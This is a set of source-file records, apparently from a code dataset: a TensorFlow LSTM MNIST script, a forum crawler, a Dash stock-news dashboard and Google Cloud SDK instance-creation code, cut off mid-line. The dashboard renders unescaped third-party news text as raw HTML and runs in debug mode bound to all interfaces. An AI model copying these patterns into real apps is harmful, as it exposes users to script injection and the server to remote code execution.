tf.placeholder(tf.float32,[None,n_classes])\r\n\r\n# define weights and biases\r\nweights = {\r\n \"in\":tf.Variable(tf.random_normal([n_inputs,n_hidden_units])),\r\n \"out\":tf.Variable(tf.random_normal([n_hidden_units,n_classes]))\r\n}\r\n\r\nbiases = {\r\n \"in\":tf.Variable(tf.constant(0.1,shape = [1,n_hidden_units])),\r\n \"out\":tf.Variable(tf.constant(0.1,shape = [1,n_classes]))\r\n}\r\n\r\ndef RNN(inputs,weights,biases):\r\n # transform the input (128,28,28) dimensions, i.e. (batch_size,n_steps,n_inputs)\r\n x = tf.reshape(inputs,[-1,n_inputs]) #x(128*28,28)\r\n x_in = tf.matmul(x,weights['in'])+biases['in'] #x_in(128*28,128)\r\n # transform the data dimensions back\r\n x_in = tf.reshape(x_in,[-1,n_steps,n_hidden_units]) #x_in(128,28,128)\r\n # define the RNN cell\r\n lstm_cell = tf.nn.rnn_cell.BasicLSTMCell(n_hidden_units,forget_bias=1.0) # set the initial forget bias = 1\r\n _init_state = lstm_cell.zero_state(batch_size,dtype=tf.float32) # initialize the state\r\n # compute the RNN\r\n outputs,states = tf.nn.dynamic_rnn(lstm_cell,x_in,initial_state=_init_state,time_major=False)\r\n # output\r\n outputs = tf.unpack(tf.transpose(outputs,[1,0,2]))\r\n results = tf.matmul(outputs[-1],weights['out'])+biases['out']\r\n return results\r\n\r\nprediction = RNN(xs,weights,biases)\r\n# compute the cross entropy of the softmax layer\r\ncost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(prediction,ys))\r\n# gradient descent\r\ntrain = tf.train.AdamOptimizer(learning_rate).minimize(cost)\r\n\r\ntrue_pred = tf.equal(tf.argmax(prediction,1),tf.argmax(ys,1))\r\naccuracy = tf.reduce_mean(tf.cast(true_pred,tf.float32))\r\n\r\n# initialize\r\ninit = tf.initialize_all_variables()\r\nwith tf.Session() as sess:\r\n sess.run(init)\r\n step = 0\r\n while step*batch_size < epochs:\r\n batch_xs,batch_ys = mnist.train.next_batch(batch_size)\r\n batch_xs = batch_xs.reshape([batch_size,n_steps,n_inputs])\r\n sess.run(train,feed_dict={xs:batch_xs,ys:batch_ys})\r\n if step % 50 ==0:\r\n print(sess.run(cost,feed_dict={xs:batch_xs,ys:batch_ys}))\r\n step += 1\r\n print(sess.run(accuracy,feed_dict={xs:batch_xs,ys:batch_ys}))","repo_name":"sun123zhengjun/deep-learning-","sub_path":"RNN.py","file_name":"RNN.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"35015360309","text":"# -*- encoding:utf-8 -*-\n'''\nA crawler framework, can easily config to suit different content.\npython3.6\nwinxos 2017-10-24\n'''\nimport urllib.request\nimport urllib.error\nfrom lxml import etree\nimport logging\nimport socket\nfrom multiprocess_pool import multi_thread_do_job\n\nsocket.setdefaulttimeout(10)\nlogging.basicConfig(\n level=logging.DEBUG,\n filename='log.txt',\n filemode='w',\n format='%(asctime)s - %(filename)s[line:%(lineno)d] - %(levelname)s: %(message)s')\n\n\ndef charset_detect(f):\n char_set = [\"utf8\", \"gb2312\", \"gbk\"]\n for c in char_set:\n try:\n f.decode(c)\n return c\n except:\n continue\n return None\n\n\ndef get_content(url, try_times=3):\n logging.debug(\"visiting:\" + url)\n try:\n proxy_handler = urllib.request.ProxyHandler({'http': 'http://127.0.0.1:1080'})\n opener = urllib.request.build_opener(proxy_handler)\n opener.addheaders = [('User-Agent', 'Mozilla/5.0')]\n f = opener.open(url).read()\n try:\n # data = f.decode(f.headers.get_content_charset()) #not robust\n logging.debug(\"charset \" + charset_detect(f))\n data = f.decode(charset_detect(f))\n return etree.HTML(data)\n except Exception as e:\n logging.debug(e)\n return None\n except urllib.error.URLError as e: # catch access exceptions, usually timeouts; the details are in e\n logging.debug(\"%s %s\" % (e, url))\n return None\n    
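# on a timeout, retry by recursing with the decremented try_times counter\n    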
except TimeoutError:\n logging.debug(\"[retry %d] %s\" % (try_times, url))\n try_times -= 1\n if try_times > 0:\n return get_content(url, try_times)\n return None\n\n\ndef create_pages():\n entry = 'http://www.t66y.com/thread0806.php?fid=22&search=&page=%s'\n return [entry % i for i in range(1, 101)]\n\n\nelements = {\"item\": {\"type\": \"td[2]/text()\",\n \"author\": \"td[3]/a/text()\",\n \"title\": \"td[2]/h3/a/text()\", },\n \"url\": \"td[2]/h3/a/@href\",\n \"sub_item\": {\"text\": \"//div[@class=\\\"tpc_content do_not_catch\\\"]/a/@href\"},\n \"root\": \"//tr[@class=\\\"tr3 t_one tac\\\"]\"}\n\n\ndef get_item(page):\n ret = []\n cache = get_content(page)\n if cache is not None:\n items = cache.xpath(elements[\"root\"])\n for ii, item in enumerate(items):\n si = []\n for i in elements[\"item\"]:\n si.append(''.join(item.xpath(elements[\"item\"][i])).strip())\n sub_page_url = \"http://www.t66y.com/\" + ''.join(item.xpath(elements[\"url\"]))\n d = get_content(sub_page_url)\n real_url = str(d.xpath(elements[\"sub_item\"][\"text\"])[0])\n si.append(real_url[24:].replace(\"______\", \".\"))\n ret += si\n print(si)\n return ret\n return None\n\n\ndef test_py_crawler():\n pages = create_pages()\n multi_thread_do_job(pages, get_item)\n\n\ntest_py_crawler()\n","repo_name":"winxos/py_crawler","sub_path":"py_crawler.py","file_name":"py_crawler.py","file_ext":"py","file_size_in_byte":2894,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"17194906543","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 12 23:15:56 2021\n\n@author: marcinswierczewski\n\"\"\"\n\nfrom stocks_api import finnhub_return_close_series, finnhub_news_company\n\nNEWS_AMOUNT = 7\nFROM_DATE = '2018-09-01'\nSTOCKS_LIST = ['MS','PPL','MSFT', 'PYPL', 'MAXR']\ndf = finnhub_return_close_series(STOCKS_LIST, FROM_DATE)\nnews = finnhub_news_company(STOCKS_LIST, FROM_DATE)\n\nfrom datetime import datetime\n\nimport dash\nfrom dash import dcc, html\nfrom dash.dependencies import Input, Output\nimport plotly.express as px\nimport dash_dangerously_set_inner_html\n\napp = dash.Dash(__name__)\n\napp.layout = html.Div([\n \n html.Div([\n html.Div([\n\n html.Div([\n html.H5('Marcins Browse of the Followed Stocks'),\n html.H6('Dashboard inspired by GS style dashboards.', style=dict(color='#7F90AC')),\n ], className = \"nine columns padded\" ),\n\n html.Div([\n html.H1([html.Span('V.', style=dict(opacity=0.5)), html.Span('0.1')]),\n html.H6('Daily updates below')\n ], className = \"three columns gs-header gs-accent-header padded\", style=dict(float='right') ),\n\n ], className = \"row gs-header gs-text-header\"),\n \n \n \n \n \n dcc.Dropdown(\n id=\"ticker\",\n options=[{\"label\": x, \"value\": x} \n for x in df.columns],\n value=df.columns[0],\n clearable=False,),\n dcc.Graph(id=\"time-series-chart\"),\n \n \n \n \n html.Div([\n html.H6(\"Latest Company News:\", className = \"gs-header gs-table-header padded\"),\n ], className = \"twelve columns\" ),\n \n \n \n html.Div([\n html.P(id='text1')\n ], className = \"twelve columns \" ),\n \n \n \n html.Div([\n html.H6(\" \", className = \"gs-header gs-table-header padded\"),\n ], className = \"twelve columns\" ),\n\n\n\n ], className = \"page\" ),\n])\n\n@app.callback(\n [Output(\"time-series-chart\", \"figure\"),\n Output('text1', 'children')],\n [Input(\"ticker\", \"value\")])\ndef display_time_series(ticker):\n fig = px.line(df, x=df.index, y=ticker)\n \n news_len = len(news[ticker])\n max_news = min(news_len, 
NEWS_AMOUNT)\n all_recent_news = ''\n for i in range(max_news):\n headline = news[ticker][i]['headline']\n text = news[ticker][i]['summary']\n news_date = news[ticker][i]['datetime']\n url = news[ticker][i]['url']\n \n all_recent_news += 'Date: ' + str(datetime.fromtimestamp(news_date)) + '<br>      '\n all_recent_news += 'HEADLINE :' + str(headline) + '<br>      '\n all_recent_news += text + '<br><br>      '\n # all_recent_news += ' URL ' + url + '<br><br>      '\n\n\n \n \n \n return fig, dash_dangerously_set_inner_html.DangerouslySetInnerHTML(all_recent_news)\n\n\nif __name__ == '__main__':\n app.run_server(debug=True, port=8050, host='0.0.0.0')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"marcinms7/stock-predictions","sub_path":"interactive_stocks_graphs.py","file_name":"interactive_stocks_graphs.py","file_ext":"py","file_size_in_byte":3174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"5274741887","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import unicode_literals\n\nimport re\n\nfrom googlecloudsdk.api_lib.compute import base_classes\nfrom googlecloudsdk.api_lib.compute import base_classes_resource_registry as resource_registry\nfrom googlecloudsdk.api_lib.compute import csek_utils\nfrom googlecloudsdk.api_lib.compute import image_utils\nfrom googlecloudsdk.api_lib.compute import instance_utils\nfrom googlecloudsdk.api_lib.compute import metadata_utils\nfrom googlecloudsdk.api_lib.compute.operations import poller\nfrom googlecloudsdk.calliope import base\nfrom googlecloudsdk.calliope import exceptions\nfrom googlecloudsdk.command_lib.compute import completers\nfrom googlecloudsdk.command_lib.compute import flags\nfrom googlecloudsdk.command_lib.compute.instances import flags as instances_flags\nfrom googlecloudsdk.command_lib.compute.resource_policies import flags as maintenance_flags\nfrom googlecloudsdk.command_lib.compute.resource_policies import util as maintenance_util\nfrom googlecloudsdk.command_lib.compute.sole_tenancy import flags as sole_tenancy_flags\nfrom googlecloudsdk.command_lib.util.args import labels_util\nfrom googlecloudsdk.core import exceptions as core_exceptions\nfrom googlecloudsdk.core import log\nimport six\nfrom six.moves import zip\n\nDETAILED_HELP = {\n 'DESCRIPTION': \"\"\"\\\n *{command}* facilitates the creation of Google Compute Engine\n virtual machines. For example, running:\n\n $ {command} example-instance-1 example-instance-2 example-instance-3 --zone us-central1-a\n\n will create three instances called `example-instance-1`,\n `example-instance-2`, and `example-instance-3` in the\n `us-central1-a` zone.\n\n When an instance is in RUNNING state and the system begins to boot,\n the instance creation is considered finished, and the command returns\n with a list of new virtual machines. Note that you usually cannot log\n into a new instance until it finishes booting. 
Check the progress of an\n instance using `gcloud compute instances get-serial-port-output`.\n\n For more examples, refer to the *EXAMPLES* section below.\n \"\"\",\n 'EXAMPLES': \"\"\"\\\n To create an instance with the latest ``Red Hat Enterprise Linux\n 8'' image available, run:\n\n $ {command} example-instance --image-family=rhel-8 --image-project=rhel-cloud --zone=us-central1-a\n \"\"\",\n}\n\n\ndef _CommonArgs(parser,\n enable_regional=False,\n enable_kms=False,\n deprecate_maintenance_policy=False,\n supports_reservation=False,\n enable_resource_policy=False,\n supports_min_node_cpus=False,\n snapshot_csek=False,\n image_csek=False):\n \"\"\"Register parser args common to all tracks.\"\"\"\n metadata_utils.AddMetadataArgs(parser)\n instances_flags.AddDiskArgs(parser, enable_regional, enable_kms=enable_kms)\n instances_flags.AddCreateDiskArgs(parser, enable_kms=enable_kms,\n enable_snapshots=True,\n resource_policy=enable_resource_policy,\n source_snapshot_csek=snapshot_csek,\n image_csek=image_csek)\n instances_flags.AddCanIpForwardArgs(parser)\n instances_flags.AddAddressArgs(parser, instances=True)\n instances_flags.AddAcceleratorArgs(parser)\n instances_flags.AddMachineTypeArgs(parser)\n instances_flags.AddMaintenancePolicyArgs(\n parser, deprecate=deprecate_maintenance_policy)\n instances_flags.AddNoRestartOnFailureArgs(parser)\n instances_flags.AddPreemptibleVmArgs(parser)\n instances_flags.AddServiceAccountAndScopeArgs(\n parser, False,\n extra_scopes_help='However, if neither `--scopes` nor `--no-scopes` are '\n 'specified and the project has no default service '\n 'account, then the instance will be created with no '\n 'scopes. Note that the level of access that a service '\n 'account has is determined by a combination of access '\n 'scopes and IAM roles so you must configure both '\n 'access scopes and IAM roles for the service account '\n 'to work properly.')\n instances_flags.AddTagsArgs(parser)\n instances_flags.AddCustomMachineTypeArgs(parser)\n instances_flags.AddNetworkArgs(parser)\n instances_flags.AddPrivateNetworkIpArgs(parser)\n instances_flags.AddHostnameArg(parser)\n instances_flags.AddImageArgs(parser, enable_snapshots=True)\n instances_flags.AddDeletionProtectionFlag(parser)\n instances_flags.AddPublicPtrArgs(parser, instance=True)\n instances_flags.AddNetworkTierArgs(parser, instance=True)\n instances_flags.AddShieldedInstanceConfigArgs(parser)\n instances_flags.AddDisplayDeviceArg(parser)\n\n if supports_reservation:\n instances_flags.AddReservationAffinityGroup(\n parser,\n group_text='Specifies the reservation for the instance.',\n affinity_text='The type of reservation for the instance.')\n\n sole_tenancy_flags.AddNodeAffinityFlagToParser(parser)\n\n if supports_min_node_cpus:\n sole_tenancy_flags.AddMinNodeCpusArg(parser)\n\n labels_util.AddCreateLabelsFlags(parser)\n\n parser.add_argument(\n '--description',\n help='Specifies a textual description of the instances.')\n\n instances_flags.INSTANCES_ARG_FOR_CREATE.AddArgument(\n parser, operation_type='create')\n\n csek_utils.AddCsekKeyArgs(parser)\n\n base.ASYNC_FLAG.AddToParser(parser)\n parser.display_info.AddFormat(\n resource_registry.RESOURCE_REGISTRY['compute.instances'].list_format)\n parser.display_info.AddCacheUpdater(completers.InstancesCompleter)\n\n\n@base.ReleaseTracks(base.ReleaseTrack.GA)\nclass Create(base.CreateCommand):\n \"\"\"Create Google Compute Engine virtual machine instances.\"\"\"\n\n _support_kms = True\n _support_nvdimm = False\n _support_public_dns = False\n 
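# Feature gates for this release track; newer instance features stay disabled in GA.\n  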
_support_reservation = False\n _support_disk_resource_policy = False\n _support_erase_vss = False\n _support_machine_image_key = False\n _support_min_node_cpus = False\n _support_source_snapshot_csek = False\n _support_image_csek = False\n\n @classmethod\n def Args(cls, parser):\n _CommonArgs(parser, enable_kms=cls._support_kms)\n cls.SOURCE_INSTANCE_TEMPLATE = (\n instances_flags.MakeSourceInstanceTemplateArg())\n cls.SOURCE_INSTANCE_TEMPLATE.AddArgument(parser)\n instances_flags.AddLocalSsdArgs(parser)\n instances_flags.AddMinCpuPlatformArgs(parser, base.ReleaseTrack.GA)\n\n def Collection(self):\n return 'compute.instances'\n\n def GetSourceInstanceTemplate(self, args, resources):\n \"\"\"Get sourceInstanceTemplate value as required by API.\"\"\"\n if not args.IsSpecified('source_instance_template'):\n return None\n ref = self.SOURCE_INSTANCE_TEMPLATE.ResolveAsResource(args, resources)\n return ref.SelfLink()\n\n def GetSourceMachineImage(self, args, resources):\n \"\"\"Get sourceMachineImage value as required by API.\"\"\"\n return None\n\n def _BuildShieldedInstanceConfigMessage(self, messages, args):\n if (args.IsSpecified('shielded_vm_secure_boot') or\n args.IsSpecified('shielded_vm_vtpm') or\n args.IsSpecified('shielded_vm_integrity_monitoring')):\n return instance_utils.CreateShieldedInstanceConfigMessage(\n messages, args.shielded_vm_secure_boot, args.shielded_vm_vtpm,\n args.shielded_vm_integrity_monitoring)\n else:\n return None\n\n def _GetNetworkInterfaces(\n self, args, client, holder, instance_refs, skip_defaults):\n return instance_utils.GetNetworkInterfaces(\n args, client, holder, instance_refs, skip_defaults)\n\n def _GetDiskMessages(\n self, args, skip_defaults, instance_refs, compute_client,\n resource_parser, create_boot_disk, boot_disk_size_gb, image_uri,\n csek_keys):\n flags_to_check = [\n 'disk', 'local_ssd', 'boot_disk_type',\n 'boot_disk_device_name', 'boot_disk_auto_delete',\n 'require_csek_key_create',\n ]\n if self._support_kms:\n flags_to_check.extend([\n 'create_disk', 'boot_disk_kms_key', 'boot_disk_kms_project',\n 'boot_disk_kms_location', 'boot_disk_kms_keyring',\n ])\n if self._support_nvdimm:\n flags_to_check.extend(['local_nvdimm'])\n\n if (skip_defaults and\n not instance_utils.IsAnySpecified(args, *flags_to_check)):\n return [[] for _ in instance_refs]\n\n # A list of lists where the element at index i contains a list of\n # disk messages that should be set for the instance at index i.\n disks_messages = []\n\n # A mapping of zone to boot disk references for all existing boot\n # disks that are being attached.\n # TODO(b/36050875): Simplify since resources.Resource is now hashable.\n existing_boot_disks = {}\n for instance_ref in instance_refs:\n persistent_disks, boot_disk_ref = (\n instance_utils.CreatePersistentAttachedDiskMessages(\n resource_parser, compute_client, csek_keys,\n args.disk or [], instance_ref))\n persistent_create_disks = (\n instance_utils.CreatePersistentCreateDiskMessages(\n compute_client,\n resource_parser,\n csek_keys,\n getattr(args, 'create_disk', []),\n instance_ref,\n enable_kms=self._support_kms,\n enable_snapshots=True,\n resource_policy=self._support_disk_resource_policy,\n enable_source_snapshot_csek=self._support_source_snapshot_csek,\n enable_image_csek=self._support_image_csek))\n local_nvdimms = []\n if self._support_nvdimm:\n local_nvdimms = instance_utils.CreateLocalNvdimmMessages(\n args,\n resource_parser,\n compute_client.messages,\n instance_ref.zone,\n instance_ref.project\n )\n local_ssds = 
instance_utils.CreateLocalSsdMessages(\n args,\n resource_parser,\n compute_client.messages,\n instance_ref.zone,\n instance_ref.project\n )\n\n if create_boot_disk:\n boot_snapshot_uri = instance_utils.ResolveSnapshotURI(\n user_project=instance_refs[0].project,\n snapshot=args.source_snapshot,\n resource_parser=resource_parser)\n\n boot_disk = instance_utils.CreateDefaultBootAttachedDiskMessage(\n compute_client, resource_parser,\n disk_type=args.boot_disk_type,\n disk_device_name=args.boot_disk_device_name,\n disk_auto_delete=args.boot_disk_auto_delete,\n disk_size_gb=boot_disk_size_gb,\n require_csek_key_create=(\n args.require_csek_key_create if csek_keys else None),\n image_uri=image_uri,\n instance_ref=instance_ref,\n csek_keys=csek_keys,\n kms_args=args,\n snapshot_uri=boot_snapshot_uri,\n enable_kms=self._support_kms)\n persistent_disks = [boot_disk] + persistent_disks\n else:\n existing_boot_disks[boot_disk_ref.zone] = boot_disk_ref\n disks_messages.append(persistent_disks + persistent_create_disks +\n local_nvdimms + local_ssds)\n return disks_messages\n\n def _GetProjectToServiceAccountMap(\n self, args, instance_refs, client, skip_defaults):\n project_to_sa = {}\n for instance_ref in instance_refs:\n if instance_ref.project not in project_to_sa:\n scopes = None\n if not args.no_scopes and not args.scopes:\n # User didn't provide any input on scopes. If project has no default\n # service account then we want to create a VM with no scopes\n request = (client.apitools_client.projects,\n 'Get',\n client.messages.ComputeProjectsGetRequest(\n project=instance_ref.project))\n errors = []\n result = client.MakeRequests([request], errors)\n if not errors:\n if not result[0].defaultServiceAccount:\n scopes = []\n log.status.Print(\n 'There is no default service account for project {}. 
'\n                 'Instance {} will not have scopes.'.format(\n                     instance_ref.project, instance_ref.Name()))\n        if scopes is None:\n          scopes = [] if args.no_scopes else args.scopes\n\n        if args.no_service_account:\n          service_account = None\n        else:\n          service_account = args.service_account\n        if (skip_defaults and not args.IsSpecified('scopes') and\n            not args.IsSpecified('no_scopes') and\n            not args.IsSpecified('service_account') and\n            not args.IsSpecified('no_service_account')):\n          service_accounts = []\n        else:\n          service_accounts = instance_utils.CreateServiceAccountMessages(\n              messages=client.messages,\n              scopes=scopes,\n              service_account=service_account)\n        project_to_sa[instance_ref.project] = service_accounts\n    return project_to_sa\n\n  def _GetImageUri(\n      self, args, client, create_boot_disk, instance_refs, resource_parser):\n    if create_boot_disk:\n      image_expander = image_utils.ImageExpander(client, resource_parser)\n      image_uri, _ = image_expander.ExpandImageFlag(\n          user_project=instance_refs[0].project,\n          image=args.image,\n          image_family=args.image_family,\n          image_project=args.image_project,\n          return_image_resource=False)\n      return image_uri\n\n  def _GetNetworkInterfacesWithValidation(\n      self, args, resource_parser, compute_client, holder, instance_refs,\n      skip_defaults):\n    if args.network_interface:\n      return instance_utils.CreateNetworkInterfaceMessages(\n          resources=resource_parser,\n          compute_client=compute_client,\n          network_interface_arg=args.network_interface,\n          instance_refs=instance_refs)\n    else:\n      instances_flags.ValidatePublicPtrFlags(args)\n      if self._support_public_dns:\n        instances_flags.ValidatePublicDnsFlags(args)\n\n      return self._GetNetworkInterfaces(\n          args, compute_client, holder, instance_refs, skip_defaults)\n\n  def _CreateRequests(\n      self, args, instance_refs, compute_client, resource_parser, holder):\n    # gcloud creates default values for some fields in Instance resource\n    # when no value was specified on command line.\n    # When --source-instance-template was specified, defaults are taken from\n    # Instance Template and gcloud flags are used to override them - by default\n    # fields should not be initialized.\n    source_instance_template = self.GetSourceInstanceTemplate(\n        args, resource_parser)\n    skip_defaults = source_instance_template is not None\n\n    source_machine_image = self.GetSourceMachineImage(\n        args, resource_parser)\n    skip_defaults = skip_defaults or source_machine_image is not None\n\n    scheduling = instance_utils.GetScheduling(\n        args, compute_client, skip_defaults, support_node_affinity=True,\n        support_min_node_cpus=self._support_min_node_cpus)\n    tags = instance_utils.GetTags(args, compute_client)\n    labels = instance_utils.GetLabels(args, compute_client)\n    metadata = instance_utils.GetMetadata(args, compute_client, skip_defaults)\n    boot_disk_size_gb = instance_utils.GetBootDiskSizeGb(args)\n\n    network_interfaces = self._GetNetworkInterfacesWithValidation(\n        args, resource_parser, compute_client, holder, instance_refs,\n        skip_defaults)\n\n    machine_type_uris = instance_utils.GetMachineTypeUris(\n        args, compute_client, holder, instance_refs, skip_defaults)\n\n    create_boot_disk = not instance_utils.UseExistingBootDisk(args.disk or [])\n    image_uri = self._GetImageUri(\n        args, compute_client, create_boot_disk, instance_refs, resource_parser)\n\n    shielded_instance_config = self._BuildShieldedInstanceConfigMessage(\n        messages=compute_client.messages, args=args)\n\n    # TODO(b/80138906): Release track should not be used like this.\n    # These features are only exposed in alpha/beta\n    
allow_rsa_encrypted = False\n if self.ReleaseTrack() in [base.ReleaseTrack.ALPHA, base.ReleaseTrack.BETA]:\n allow_rsa_encrypted = True\n\n csek_keys = csek_utils.CsekKeyStore.FromArgs(args, allow_rsa_encrypted)\n disks_messages = self._GetDiskMessages(\n args, skip_defaults, instance_refs, compute_client, resource_parser,\n create_boot_disk, boot_disk_size_gb, image_uri, csek_keys)\n\n project_to_sa = self._GetProjectToServiceAccountMap(\n args, instance_refs, compute_client, skip_defaults)\n\n requests = []\n for instance_ref, machine_type_uri, disks in zip(\n instance_refs, machine_type_uris, disks_messages):\n\n can_ip_forward = instance_utils.GetCanIpForward(args, skip_defaults)\n guest_accelerators = instance_utils.GetAccelerators(\n args, compute_client, resource_parser, instance_ref)\n\n instance = compute_client.messages.Instance(\n canIpForward=can_ip_forward,\n deletionProtection=args.deletion_protection,\n description=args.description,\n disks=disks,\n guestAccelerators=guest_accelerators,\n hostname=args.hostname,\n labels=labels,\n machineType=machine_type_uri,\n metadata=metadata,\n minCpuPlatform=args.min_cpu_platform,\n name=instance_ref.Name(),\n networkInterfaces=network_interfaces,\n serviceAccounts=project_to_sa[instance_ref.project],\n scheduling=scheduling,\n tags=tags)\n\n resource_policies = getattr(\n args, 'resource_policies', None)\n if resource_policies:\n parsed_resource_policies = []\n for policy in resource_policies:\n resource_policy_ref = maintenance_util.ParseResourcePolicyWithZone(\n resource_parser,\n policy,\n project=instance_ref.project,\n zone=instance_ref.zone)\n parsed_resource_policies.append(resource_policy_ref.SelfLink())\n instance.resourcePolicies = parsed_resource_policies\n\n if shielded_instance_config:\n instance.shieldedInstanceConfig = shielded_instance_config\n\n if self._support_erase_vss and \\\n args.IsSpecified('erase_windows_vss_signature'):\n instance.eraseWindowsVssSignature = args.erase_windows_vss_signature\n\n request = compute_client.messages.ComputeInstancesInsertRequest(\n instance=instance,\n project=instance_ref.project,\n zone=instance_ref.zone)\n\n if source_instance_template:\n request.sourceInstanceTemplate = source_instance_template\n\n if source_machine_image:\n request.instance.sourceMachineImage = source_machine_image\n if args.IsSpecified('source_machine_image_csek_key_file'):\n key = instance_utils.GetSourceMachineImageKey(\n args, self.SOURCE_MACHINE_IMAGE, compute_client, holder)\n request.instance.sourceMachineImageEncryptionKey = key\n\n if self._support_machine_image_key and \\\n args.IsSpecified('source_machine_image_csek_key_file'):\n if not args.IsSpecified('source_machine_image'):\n raise exceptions.RequiredArgumentException(\n '`--source-machine-image`',\n '`--source-machine-image-csek-key-file` requires '\n '`--source-machine-image` to be specified`')\n\n if args.IsSpecified('enable_display_device'):\n request.instance.displayDevice = compute_client.messages.DisplayDevice(\n enableDisplay=args.enable_display_device)\n\n if self._support_reservation:\n request.instance.reservationAffinity = instance_utils.GetReservationAffinity(\n args, compute_client)\n\n requests.append(\n (compute_client.apitools_client.instances, 'Insert', request))\n return requests\n\n def Run(self, args):\n instances_flags.ValidateDiskFlags(\n args, enable_kms=self._support_kms, enable_snapshots=True,\n enable_source_snapshot_csek=self._support_source_snapshot_csek,\n enable_image_csek=self._support_image_csek)\n 
instances_flags.ValidateImageFlags(args)\n instances_flags.ValidateLocalSsdFlags(args)\n instances_flags.ValidateNicFlags(args)\n instances_flags.ValidateServiceAccountAndScopeArgs(args)\n instances_flags.ValidateAcceleratorArgs(args)\n instances_flags.ValidateNetworkTierArgs(args)\n\n if self._support_reservation:\n instances_flags.ValidateReservationAffinityGroup(args)\n\n holder = base_classes.ComputeApiHolder(self.ReleaseTrack())\n compute_client = holder.client\n resource_parser = holder.resources\n\n instance_refs = instance_utils.GetInstanceRefs(args, compute_client, holder)\n\n requests = self._CreateRequests(\n args, instance_refs, compute_client, resource_parser, holder)\n if not args.async_:\n # TODO(b/63664449): Replace this with poller + progress tracker.\n try:\n # Using legacy MakeRequests (which also does polling) here until\n # replaced by api_lib.utils.waiter.\n return compute_client.MakeRequests(requests)\n except exceptions.ToolException as e:\n invalid_machine_type_message_regex = (\n r'Invalid value for field \\'resource.machineType\\': .+. '\n r'Machine type with name \\'.+\\' does not exist in zone \\'.+\\'\\.')\n if re.search(invalid_machine_type_message_regex, six.text_type(e)):\n raise exceptions.ToolException(\n six.text_type(e) +\n '\\nUse `gcloud compute machine-types list --zones` to see the '\n 'available machine types.')\n raise\n\n errors_to_collect = []\n responses = compute_client.BatchRequests(requests, errors_to_collect)\n for r in responses:\n err = getattr(r, 'error', None)\n if err:\n errors_to_collect.append(poller.OperationErrors(err.errors))\n if errors_to_collect:\n raise core_exceptions.MultiError(errors_to_collect)\n\n operation_refs = [holder.resources.Parse(r.selfLink) for r in responses]\n\n log.status.Print('NOTE: The users will be charged for public IPs when VMs '\n 'are created.')\n\n for instance_ref, operation_ref in zip(instance_refs, operation_refs):\n log.status.Print('Instance creation in progress for [{}]: {}'\n .format(instance_ref.instance, operation_ref.SelfLink()))\n log.status.Print('Use [gcloud compute operations describe URI] command '\n 'to check the status of the operation(s).')\n if not args.IsSpecified('format'):\n # For async output we need a separate format. 
Since we already printed\n      # information about the operations in the status messages, nothing else\n      # needs to be printed.\n      args.format = 'disable'\n    return responses\n\n\n@base.ReleaseTracks(base.ReleaseTrack.BETA)\nclass CreateBeta(Create):\n  \"\"\"Create Google Compute Engine virtual machine instances.\"\"\"\n\n  _support_kms = True\n  _support_nvdimm = False\n  _support_public_dns = False\n  _support_reservation = True\n  _support_disk_resource_policy = True\n  _support_erase_vss = False\n  _support_machine_image_key = False\n  _support_min_node_cpus = False\n  _support_source_snapshot_csek = False\n  _support_image_csek = False\n\n  def _GetNetworkInterfaces(\n      self, args, client, holder, instance_refs, skip_defaults):\n    return instance_utils.GetNetworkInterfaces(args, client, holder,\n                                               instance_refs, skip_defaults)\n\n  @classmethod\n  def Args(cls, parser):\n    _CommonArgs(\n        parser,\n        enable_regional=True,\n        enable_kms=True,\n        supports_reservation=cls._support_reservation,\n        enable_resource_policy=cls._support_disk_resource_policy,\n    )\n    cls.SOURCE_INSTANCE_TEMPLATE = (\n        instances_flags.MakeSourceInstanceTemplateArg())\n    cls.SOURCE_INSTANCE_TEMPLATE.AddArgument(parser)\n    instances_flags.AddLocalSsdArgs(parser)\n    instances_flags.AddMinCpuPlatformArgs(parser, base.ReleaseTrack.BETA)\n\n\n@base.ReleaseTracks(base.ReleaseTrack.ALPHA)\nclass CreateAlpha(CreateBeta):\n  \"\"\"Create Google Compute Engine virtual machine instances.\"\"\"\n\n  _support_kms = True\n  _support_nvdimm = True\n  _support_public_dns = True\n  _support_reservation = True\n  _support_disk_resource_policy = True\n  _support_erase_vss = True\n  _support_machine_image_key = True\n  _support_min_node_cpus = True\n  _support_source_snapshot_csek = True\n  _support_image_csek = True\n\n  def _GetNetworkInterfaces(\n      self, args, client, holder, instance_refs, skip_defaults):\n    return instance_utils.GetNetworkInterfacesAlpha(\n        args, client, holder, instance_refs, skip_defaults)\n\n  def GetSourceMachineImage(self, args, resources):\n    if not args.IsSpecified('source_machine_image'):\n      return None\n    ref = self.SOURCE_MACHINE_IMAGE.ResolveAsResource(args, resources)\n    return ref.SelfLink()\n\n  @classmethod\n  def Args(cls, parser):\n    _CommonArgs(\n        parser,\n        enable_regional=True,\n        enable_kms=True,\n        deprecate_maintenance_policy=True,\n        supports_reservation=cls._support_reservation,\n        enable_resource_policy=cls._support_disk_resource_policy,\n        supports_min_node_cpus=cls._support_min_node_cpus,\n        snapshot_csek=True,\n        image_csek=True)\n    CreateAlpha.SOURCE_INSTANCE_TEMPLATE = (\n        instances_flags.MakeSourceInstanceTemplateArg())\n    CreateAlpha.SOURCE_INSTANCE_TEMPLATE.AddArgument(parser)\n    CreateAlpha.SOURCE_MACHINE_IMAGE = (\n        instances_flags.AddMachineImageArg())\n    CreateAlpha.SOURCE_MACHINE_IMAGE.AddArgument(parser)\n    instances_flags.AddSourceMachineImageEncryptionKey(parser)\n    instances_flags.AddMinCpuPlatformArgs(parser, base.ReleaseTrack.ALPHA)\n    instances_flags.AddPublicDnsArgs(parser, instance=True)\n    instances_flags.AddLocalSsdArgsWithSize(parser)\n    instances_flags.AddLocalNvdimmArgs(parser)\n    flags.AddEraseVssSignature(parser, 'source snapshots or source machine'\n                                       ' image')\n    maintenance_flags.AddResourcePoliciesArgs(parser, 'added to', 'instance')\n\nCreate.detailed_help = 
